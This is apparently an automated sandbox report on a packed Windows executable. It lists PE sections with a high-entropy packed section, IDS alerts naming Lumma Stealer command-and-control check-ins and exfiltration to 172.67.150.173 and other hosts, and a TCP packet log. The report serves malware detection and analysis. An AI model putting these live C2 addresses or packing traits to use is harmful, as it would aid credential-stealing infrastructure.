                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        adc byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add ecx, dword ptr [edx]
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x530540x68.idata
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x531f80x8.idata
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                        0x10000x510000x24800615fabbd27714497d36364e861d6cbc4False0.9974047517123288data7.9798629308220566IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                        .rsrc 0x520000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                        .idata 0x530000x10000x20019a29171433eeef17e42fd663f137134False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                        avozcotg0x540000x2a40000x2a3c00627ff20bd557ee74a178cedfa1065bcbunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                        rwvgytwe0x2f80000x10000x40026d5dab6cd88a9b961d2adbb73157b64False0.77734375data6.149736785383608IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                        .taggant0x2f90000x30000x220088cddb85d51137aee774a3fcd3f30c58False0.05974264705882353DOS executable (COM)0.7820469884240067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                        DLLImport
                                                                                                                                                                                        kernel32.dlllstrcpy
                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                        2024-12-23T09:23:29.389976+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749699172.67.150.173443TCP
                                                                                                                                                                                        2024-12-23T09:23:30.182312+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749699172.67.150.173443TCP
                                                                                                                                                                                        2024-12-23T09:23:30.182312+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749699172.67.150.173443TCP
                                                                                                                                                                                        2024-12-23T09:23:31.540071+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749700172.67.150.173443TCP
                                                                                                                                                                                        2024-12-23T09:23:32.310553+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.749700172.67.150.173443TCP
                                                                                                                                                                                        2024-12-23T09:23:32.310553+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749700172.67.150.173443TCP
                                                                                                                                                                                        2024-12-23T09:23:34.252674+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749701172.67.150.173443TCP
                                                                                                                                                                                        2024-12-23T09:23:36.552506+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749703172.67.150.173443TCP
                                                                                                                                                                                        2024-12-23T09:23:38.917767+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749709172.67.150.173443TCP
                                                                                                                                                                                        2024-12-23T09:23:41.665068+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749716172.67.150.173443TCP
                                                                                                                                                                                        2024-12-23T09:23:42.427857+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.749716172.67.150.173443TCP
                                                                                                                                                                                        2024-12-23T09:23:44.347063+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749723172.67.150.173443TCP
                                                                                                                                                                                        2024-12-23T09:23:49.240072+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749740172.67.150.173443TCP
                                                                                                                                                                                        2024-12-23T09:23:49.985216+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749740172.67.150.173443TCP
                                                                                                                                                                                        2024-12-23T09:23:51.519479+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749746185.166.143.50443TCP
                                                                                                                                                                                        2024-12-23T09:23:54.015497+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.7497523.5.25.82443TCP
                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                        Dec 23, 2024 09:23:28.156301975 CET49699443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:28.156356096 CET44349699172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:28.156423092 CET49699443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:28.160012007 CET49699443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:28.160023928 CET44349699172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:29.389894962 CET44349699172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:29.389976025 CET49699443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:29.393460035 CET49699443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:29.393471003 CET44349699172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:29.394292116 CET44349699172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:29.442653894 CET49699443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:29.445832968 CET49699443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:29.445863008 CET49699443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:29.446072102 CET44349699172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:30.182347059 CET44349699172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:30.182440042 CET44349699172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:30.182531118 CET49699443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:30.200337887 CET49699443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:30.200355053 CET44349699172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:30.215754032 CET49700443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:30.215780973 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:30.215850115 CET49700443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:30.216418982 CET49700443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:30.216434002 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:31.539932013 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:31.540071011 CET49700443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:31.541282892 CET49700443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:31.541292906 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:31.541595936 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:31.542917013 CET49700443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:31.542954922 CET49700443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:31.542992115 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.310538054 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.310606956 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.310648918 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.310713053 CET49700443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:32.310733080 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.310760975 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.310781002 CET49700443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:32.310786963 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.310834885 CET49700443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:32.313606024 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.313657999 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.313744068 CET49700443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:32.313751936 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.323040962 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.323102951 CET49700443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:32.323110104 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.332648993 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.332711935 CET49700443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:32.332720995 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.380297899 CET49700443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:32.430316925 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.473921061 CET49700443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:32.473951101 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.502305031 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.503273010 CET49700443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:32.503303051 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.506010056 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.506122112 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.506181002 CET49700443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:32.506310940 CET49700443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:32.506326914 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:32.506339073 CET49700443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:32.506346941 CET44349700172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:33.039072990 CET49701443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:33.039117098 CET44349701172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:33.039222002 CET49701443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:33.039578915 CET49701443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:33.039594889 CET44349701172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:34.252393961 CET44349701172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:34.252674103 CET49701443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:34.253819942 CET49701443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:34.253828049 CET44349701172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:34.254095078 CET44349701172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:34.256544113 CET49701443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:34.256707907 CET49701443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:34.256750107 CET44349701172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:35.239828110 CET44349701172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:35.239927053 CET44349701172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:35.240089893 CET49701443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:35.240183115 CET49701443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:35.240206003 CET44349701172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:35.340828896 CET49703443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:35.340910912 CET44349703172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:35.340996027 CET49703443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:35.341433048 CET49703443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:35.341451883 CET44349703172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:36.552427053 CET44349703172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:36.552505970 CET49703443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:36.553750992 CET49703443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:36.553776026 CET44349703172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:36.554016113 CET44349703172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:36.555347919 CET49703443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:36.555438995 CET49703443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:36.555469990 CET44349703172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:36.555700064 CET49703443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:36.599351883 CET44349703172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:37.505279064 CET44349703172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:37.505378008 CET44349703172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:37.505441904 CET49703443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:37.505568027 CET49703443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:37.505589962 CET44349703172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:37.699285030 CET49709443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:37.699325085 CET44349709172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:37.699400902 CET49709443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:37.699702978 CET49709443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:37.699707031 CET44349709172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:38.917500019 CET44349709172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:38.917767048 CET49709443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:38.919342995 CET49709443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:38.919359922 CET44349709172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:38.919737101 CET44349709172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:38.921125889 CET49709443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:38.921247005 CET49709443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:38.921264887 CET44349709172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:38.921291113 CET49709443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:38.921318054 CET49709443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:38.921363115 CET44349709172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:38.921417952 CET49709443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:38.921431065 CET44349709172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:39.823460102 CET44349709172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:39.823584080 CET44349709172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:39.823642969 CET49709443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:39.823760033 CET49709443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:39.823781967 CET44349709172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:40.383656979 CET49716443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:40.383690119 CET44349716172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:40.383825064 CET49716443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:40.384110928 CET49716443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:40.384124994 CET44349716172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:41.664889097 CET44349716172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:41.665067911 CET49716443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:41.666496038 CET49716443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:41.666502953 CET44349716172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:41.667306900 CET44349716172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:41.669182062 CET49716443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:41.669409037 CET49716443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:41.669414997 CET44349716172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:42.427867889 CET44349716172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:42.427961111 CET44349716172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:42.428237915 CET49716443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:42.428388119 CET49716443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:42.428406000 CET44349716172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:42.879301071 CET49723443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:42.879374027 CET44349723172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:42.879440069 CET49723443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:42.880003929 CET49723443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:42.880023003 CET44349723172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:44.346852064 CET44349723172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:44.347063065 CET49723443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:44.348346949 CET49723443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:44.348357916 CET44349723172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:44.349143982 CET44349723172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:44.361715078 CET49723443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:44.362494946 CET49723443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:44.362550020 CET44349723172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:44.362687111 CET49723443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:44.362728119 CET44349723172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:44.362878084 CET49723443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:44.362914085 CET44349723172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:44.363076925 CET49723443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:44.363132000 CET44349723172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:44.363306999 CET49723443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:44.363372087 CET44349723172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:44.363549948 CET49723443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:44.363594055 CET44349723172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:44.363612890 CET49723443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:44.363732100 CET49723443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:44.363780975 CET49723443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:44.407352924 CET44349723172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:44.407574892 CET49723443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:44.407665968 CET49723443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:44.407696009 CET49723443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:44.451335907 CET44349723172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:44.451644897 CET49723443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:44.451720953 CET49723443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:44.451803923 CET49723443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:44.499330997 CET44349723172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:44.499438047 CET49723443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:44.547339916 CET44349723172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:44.723990917 CET44349723172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:47.964035988 CET44349723172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:47.964147091 CET44349723172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:47.964210987 CET49723443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:47.964356899 CET49723443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:47.964385033 CET44349723172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:48.017779112 CET49740443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:48.017841101 CET44349740172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:48.017929077 CET49740443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:48.018392086 CET49740443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:48.018410921 CET44349740172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:49.239949942 CET44349740172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:49.240072012 CET49740443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:49.241260052 CET49740443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:49.241266966 CET44349740172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:49.241965055 CET44349740172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:49.250709057 CET49740443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:49.250730038 CET49740443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:49.250853062 CET44349740172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:49.985229969 CET44349740172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:49.985382080 CET44349740172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:49.985459089 CET49740443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:49.985671043 CET49740443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:49.985671997 CET49740443192.168.2.7172.67.150.173
                                                                                                                                                                                        Dec 23, 2024 09:23:49.985717058 CET44349740172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:49.985749006 CET44349740172.67.150.173192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:50.128657103 CET49746443192.168.2.7185.166.143.50
                                                                                                                                                                                        Dec 23, 2024 09:23:50.128709078 CET44349746185.166.143.50192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:50.128793955 CET49746443192.168.2.7185.166.143.50
                                                                                                                                                                                        Dec 23, 2024 09:23:50.129163980 CET49746443192.168.2.7185.166.143.50
                                                                                                                                                                                        Dec 23, 2024 09:23:50.129178047 CET44349746185.166.143.50192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:51.519346952 CET44349746185.166.143.50192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:51.519479036 CET49746443192.168.2.7185.166.143.50
                                                                                                                                                                                        Dec 23, 2024 09:23:51.522463083 CET49746443192.168.2.7185.166.143.50
                                                                                                                                                                                        Dec 23, 2024 09:23:51.522473097 CET44349746185.166.143.50192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:51.522835970 CET44349746185.166.143.50192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:51.524095058 CET49746443192.168.2.7185.166.143.50
                                                                                                                                                                                        Dec 23, 2024 09:23:51.567332983 CET44349746185.166.143.50192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:52.201996088 CET44349746185.166.143.50192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:52.202028990 CET44349746185.166.143.50192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:52.202096939 CET44349746185.166.143.50192.168.2.7
                                                                                                                                                                                        Dec 23, 2024 09:23:52.202117920 CET49746443192.168.2.7185.166.143.50
                                                                                                                                                                                        Dec 23, 2024 09:23:52.202164888 CET49746443192.168.2.7185.166.143.50
                                                                                                                                                                                        Dec 23, 2024 09:23:52.202378035 CET49746443192.168.2.7185.166.143.50
